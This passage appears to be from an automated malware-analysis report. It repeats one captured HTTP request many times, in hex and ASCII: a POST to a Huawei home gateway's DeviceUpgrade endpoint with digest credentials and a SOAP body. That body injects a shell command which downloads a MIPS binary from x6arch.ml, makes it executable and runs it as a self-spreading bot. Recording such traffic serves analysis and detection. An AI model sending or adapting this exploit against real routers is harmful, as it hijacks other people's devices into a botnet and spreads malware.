70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 